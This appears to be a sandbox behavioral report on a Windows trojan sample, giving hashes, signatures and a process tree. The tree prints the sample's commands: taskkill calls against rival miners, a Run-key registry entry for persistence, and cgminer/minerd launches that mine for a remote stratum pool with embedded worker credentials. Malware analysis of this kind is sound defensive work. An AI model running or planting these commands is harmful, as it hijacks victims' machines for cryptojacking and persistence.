Analysis
-
max time kernel
129s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
06/11/2022, 22:27
Static task
static1
Behavioral task
behavioral1
Sample
Trojan-Ransom.Win32.Blocker.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
Trojan-Ransom.Win32.Blocker.exe
Resource
win10v2004-20220901-en
General
-
Target
Trojan-Ransom.Win32.Blocker.exe
-
Size
744KB
-
MD5
9a38ae7a6eea4bafd0abd6b9ef85430b
-
SHA1
39977abea4b0c938f55b8b966ad57344ea511756
-
SHA256
c272cea2f8c2ddc5c1fbc41da1194aa8546d3927f1508138b459e9677667b4aa
-
SHA512
a2bae9b26940d2a16c61d68b63e6b7268307650d2ebc7df2bed14d9ac899cf0d713d5cf9fcde4c713e3f5eebb66eca015ed2fb7d0d04c78fbd9510d1231589e8
-
SSDEEP
12288:w1NWl6sZ9rUNeOz6rvonkJpxewNQiTmlqoJBZchQE67WorXHcIx6h3iOttj8kEcc:4Ji9rUNnz6rvcuvZzTmlqojCxorXrmSd
Malware Config
Signatures
-
Executes dropped EXE 3 IoCs
pid Process 2076 rite.exe 4780 cgminer.exe 628 minerd.exe -
resource yara_rule behavioral2/files/0x0002000000022dea-146.dat upx behavioral2/memory/2076-147-0x0000000000400000-0x0000000000459000-memory.dmp upx behavioral2/files/0x0002000000022dea-148.dat upx behavioral2/memory/2076-149-0x0000000000400000-0x0000000000459000-memory.dmp upx -
Loads dropped DLL 5 IoCs
pid Process 628 minerd.exe 628 minerd.exe 628 minerd.exe 4780 cgminer.exe 4780 cgminer.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Load = "C:\\Users\\Admin\\AppData\\Roaming\\Trojan-Ransom.Win32.Blocker.exe" reg.exe -
Kills process with taskkill 4 IoCs
pid Process 4232 taskkill.exe 4188 taskkill.exe 2520 taskkill.exe 4332 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4384 reg.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4332 taskkill.exe Token: SeDebugPrivilege 2520 taskkill.exe Token: SeDebugPrivilege 4232 taskkill.exe Token: SeDebugPrivilege 4188 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2692 Trojan-Ransom.Win32.Blocker.exe -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 2692 wrote to memory of 2100 2692 Trojan-Ransom.Win32.Blocker.exe 81 PID 2692 wrote to memory of 2100 2692 Trojan-Ransom.Win32.Blocker.exe 81 PID 2692 wrote to memory of 2100 2692 Trojan-Ransom.Win32.Blocker.exe 81 PID 2692 wrote to memory of 1412 2692 Trojan-Ransom.Win32.Blocker.exe 82 PID 2692 wrote to memory of 1412 2692 Trojan-Ransom.Win32.Blocker.exe 82 PID 2692 wrote to memory of 1412 2692 Trojan-Ransom.Win32.Blocker.exe 82 PID 2692 wrote to memory of 2972 2692 Trojan-Ransom.Win32.Blocker.exe 84 PID 2692 wrote to memory of 2972 2692 Trojan-Ransom.Win32.Blocker.exe 84 PID 2692 wrote to memory of 2972 2692 Trojan-Ransom.Win32.Blocker.exe 84 PID 2692 wrote to memory of 3996 2692 Trojan-Ransom.Win32.Blocker.exe 88 PID 2692 wrote to memory of 3996 2692 Trojan-Ransom.Win32.Blocker.exe 88 PID 2692 wrote to memory of 3996 2692 Trojan-Ransom.Win32.Blocker.exe 88 PID 2972 wrote to memory of 4232 2972 cmd.exe 89 PID 2972 wrote to memory of 4232 2972 cmd.exe 89 PID 2972 wrote to memory of 4232 2972 cmd.exe 89 PID 2100 wrote to memory of 4332 2100 cmd.exe 92 PID 2100 wrote to memory of 4332 2100 cmd.exe 92 PID 2100 wrote to memory of 4332 2100 cmd.exe 92 PID 1412 wrote to memory of 2520 1412 cmd.exe 91 PID 1412 wrote to memory of 2520 1412 cmd.exe 91 PID 1412 wrote to memory of 2520 1412 cmd.exe 91 PID 3996 wrote to memory of 4188 3996 cmd.exe 90 PID 3996 wrote to memory of 4188 3996 cmd.exe 90 PID 3996 wrote to memory of 4188 3996 cmd.exe 90 PID 2692 wrote to memory of 4884 2692 Trojan-Ransom.Win32.Blocker.exe 93 PID 2692 wrote to memory of 4884 2692 Trojan-Ransom.Win32.Blocker.exe 93 PID 2692 wrote to memory of 4884 2692 Trojan-Ransom.Win32.Blocker.exe 93 PID 2692 wrote to memory of 4864 2692 Trojan-Ransom.Win32.Blocker.exe 94 PID 2692 wrote to memory of 4864 2692 Trojan-Ransom.Win32.Blocker.exe 94 PID 2692 wrote to memory of 4864 2692 Trojan-Ransom.Win32.Blocker.exe 94 PID 4884 wrote to memory of 4384 4884 cmd.exe 97 PID 4884 wrote to memory of 4384 4884 cmd.exe 97 PID 4884 wrote to memory of 4384 4884 cmd.exe 97 PID 4864 wrote to memory of 2076 4864 cmd.exe 98 PID 4864 wrote to memory of 2076 4864 cmd.exe 98 PID 4864 wrote to memory of 2076 4864 cmd.exe 98 PID 2692 wrote to memory of 5032 2692 Trojan-Ransom.Win32.Blocker.exe 99 PID 2692 wrote to memory of 5032 2692 Trojan-Ransom.Win32.Blocker.exe 99 PID 2692 wrote to memory of 5032 2692 Trojan-Ransom.Win32.Blocker.exe 99 PID 2692 wrote to memory of 1568 2692 Trojan-Ransom.Win32.Blocker.exe 101 PID 2692 wrote to memory of 1568 2692 Trojan-Ransom.Win32.Blocker.exe 101 PID 2692 wrote to memory of 1568 2692 Trojan-Ransom.Win32.Blocker.exe 101 PID 5032 wrote to memory of 4780 5032 cmd.exe 103 PID 5032 wrote to memory of 4780 5032 cmd.exe 103 PID 5032 wrote to memory of 4780 5032 cmd.exe 103 PID 1568 wrote to memory of 628 1568 cmd.exe 104 PID 1568 wrote to memory of 628 1568 cmd.exe 104 PID 1568 wrote to memory of 628 1568 cmd.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Blocker.exe"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Blocker.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /IM minerd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM minerd.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4332
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /IM cgminer.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cgminer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2520
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /IM ubasoft.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ubasoft.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4232
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /IM jhprotominer.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM jhprotominer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4188
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ /f /v Load /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Trojan-Ransom.Win32.Blocker.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ /f /v Load /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Trojan-Ransom.Win32.Blocker.exe3⤵
- Adds Run key to start application
- Modifies registry key
PID:4384
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c cd %appdata% & rite.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4864 -
C:\Users\Admin\AppData\Roaming\rite.exerite.exe3⤵
- Executes dropped EXE
PID:2076
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c cd %appdata% & cd right & cgminer.exe -o stratum+tcp://us.ltcrabbit.com:3334 -u azams.zeds -p matamu -I 122⤵
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\Users\Admin\AppData\Roaming\right\cgminer.execgminer.exe -o stratum+tcp://us.ltcrabbit.com:3334 -u azams.zeds -p matamu -I 123⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4780
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c cd %appdata% & cd right & minerd.exe -o stratum+tcp://us.ltcrabbit.com:3334 -u azams.zeds -p matamu -t 32⤵
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Users\Admin\AppData\Roaming\right\minerd.exeminerd.exe -o stratum+tcp://us.ltcrabbit.com:3334 -u azams.zeds -p matamu -t 33⤵
- Executes dropped EXE
- Loads dropped DLL
PID:628
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
956KB
MD5b2e8e9f8d738a97a75ee5318068d2960
SHA1ba52cfe270abd7547ad63bec4ae5ab676e800290
SHA2560c5f208de21292cc66aba0f08fc6f0552183ba03aef5c274c5b5043b2ac78818
SHA5123fde39138af13004ceef1053abdbbd7209b26d8d053b636f7cadca3b3686638d14df32da8922ff45dd8a7c65b1d970475e38f34039b40c81eb056d4ecc26a089
-
Filesize
956KB
MD5b2e8e9f8d738a97a75ee5318068d2960
SHA1ba52cfe270abd7547ad63bec4ae5ab676e800290
SHA2560c5f208de21292cc66aba0f08fc6f0552183ba03aef5c274c5b5043b2ac78818
SHA5123fde39138af13004ceef1053abdbbd7209b26d8d053b636f7cadca3b3686638d14df32da8922ff45dd8a7c65b1d970475e38f34039b40c81eb056d4ecc26a089
-
Filesize
240KB
MD56f15c32334d2310abf30187d6294eaf5
SHA14cd819bece131457122a992200bc0e58ce6b8a40
SHA25699356e0620182b9490e2a74ee03f406e155577e7e368ace2922a10d743163ee7
SHA51234822ab7693203a6cce7846aac784f44c139d31b5d9d75306049c47ac25037e72ef4e1ce62f782bb59e5ce223878663676f42b42421ab2f2dc9150ab36694191
-
Filesize
240KB
MD56f15c32334d2310abf30187d6294eaf5
SHA14cd819bece131457122a992200bc0e58ce6b8a40
SHA25699356e0620182b9490e2a74ee03f406e155577e7e368ace2922a10d743163ee7
SHA51234822ab7693203a6cce7846aac784f44c139d31b5d9d75306049c47ac25037e72ef4e1ce62f782bb59e5ce223878663676f42b42421ab2f2dc9150ab36694191
-
Filesize
240KB
MD56f15c32334d2310abf30187d6294eaf5
SHA14cd819bece131457122a992200bc0e58ce6b8a40
SHA25699356e0620182b9490e2a74ee03f406e155577e7e368ace2922a10d743163ee7
SHA51234822ab7693203a6cce7846aac784f44c139d31b5d9d75306049c47ac25037e72ef4e1ce62f782bb59e5ce223878663676f42b42421ab2f2dc9150ab36694191
-
Filesize
183KB
MD5ea5c563db06d96b90141698afd27f2fc
SHA140a903c091336a8108685bf891d5558863346d5f
SHA256583b585078f37f5d399a228f1b8021ca0a9e904a55792281048bae9cfe0e95c1
SHA512a72430144b357be500158f682b2fb7a6038dfbf12a01f9cede5c85e55cf683aa43d681992d0c26a4ccc108c75af8067aaf105cbf22a1815e712aa4bc504e4667
-
Filesize
183KB
MD5ea5c563db06d96b90141698afd27f2fc
SHA140a903c091336a8108685bf891d5558863346d5f
SHA256583b585078f37f5d399a228f1b8021ca0a9e904a55792281048bae9cfe0e95c1
SHA512a72430144b357be500158f682b2fb7a6038dfbf12a01f9cede5c85e55cf683aa43d681992d0c26a4ccc108c75af8067aaf105cbf22a1815e712aa4bc504e4667
-
Filesize
117KB
MD572c1ff7f3c7474850b11fc962ee1620c
SHA1b94f73a1ce848d18b38274c96e863df0636f48a7
SHA2563b159da9dad9afd4bd28b5b1a53dc502a2487068055ed8c30136a76cd6924890
SHA5121ed4b3c34dd0033ec2aa05bdacaa45041d9cd5880fdb5530ca033308ab349c09d4811bb276bbdf51a3040b7a337f9a5d33796924550962a56058203799c5bd53
-
Filesize
117KB
MD572c1ff7f3c7474850b11fc962ee1620c
SHA1b94f73a1ce848d18b38274c96e863df0636f48a7
SHA2563b159da9dad9afd4bd28b5b1a53dc502a2487068055ed8c30136a76cd6924890
SHA5121ed4b3c34dd0033ec2aa05bdacaa45041d9cd5880fdb5530ca033308ab349c09d4811bb276bbdf51a3040b7a337f9a5d33796924550962a56058203799c5bd53
-
Filesize
98KB
MD5bcaf983ab27437913e76776f79b850c5
SHA18544045069e9f6e7a121825d3cfa95f77547bab3
SHA25657fd78bb3d90c04ee949c062faf6725d361de34ff2fe301bce27d0238e9190ae
SHA51249e7ecb3829d3e8c23fad59232a28c8f81eb72f7f265739cd37cad4505da089f4f8b77e100842161cf52462c05e9e8f1f3eab9fbafee1daa665e791e2fe24252
-
Filesize
98KB
MD5bcaf983ab27437913e76776f79b850c5
SHA18544045069e9f6e7a121825d3cfa95f77547bab3
SHA25657fd78bb3d90c04ee949c062faf6725d361de34ff2fe301bce27d0238e9190ae
SHA51249e7ecb3829d3e8c23fad59232a28c8f81eb72f7f265739cd37cad4505da089f4f8b77e100842161cf52462c05e9e8f1f3eab9fbafee1daa665e791e2fe24252
-
Filesize
98KB
MD5bcaf983ab27437913e76776f79b850c5
SHA18544045069e9f6e7a121825d3cfa95f77547bab3
SHA25657fd78bb3d90c04ee949c062faf6725d361de34ff2fe301bce27d0238e9190ae
SHA51249e7ecb3829d3e8c23fad59232a28c8f81eb72f7f265739cd37cad4505da089f4f8b77e100842161cf52462c05e9e8f1f3eab9fbafee1daa665e791e2fe24252
-
Filesize
714KB
MD52fb622e0d2abdd9d4da636605ebdf187
SHA1e7d7c09ee20cdeb5aaa06771917337c67be69c3f
SHA2565f8bdbd6f544bc79156e2d77cdc3b61756c8d0bed3697d5d508a9e496cae854e
SHA5124fa5c44633539be5aa56f96c4b09fe3dd04949f3f36d8fc95ac57fb73bb2a5328933d502935b50a6a2565c10c370d98b80858642e82ae8cb23eef223508f5685
-
Filesize
714KB
MD52fb622e0d2abdd9d4da636605ebdf187
SHA1e7d7c09ee20cdeb5aaa06771917337c67be69c3f
SHA2565f8bdbd6f544bc79156e2d77cdc3b61756c8d0bed3697d5d508a9e496cae854e
SHA5124fa5c44633539be5aa56f96c4b09fe3dd04949f3f36d8fc95ac57fb73bb2a5328933d502935b50a6a2565c10c370d98b80858642e82ae8cb23eef223508f5685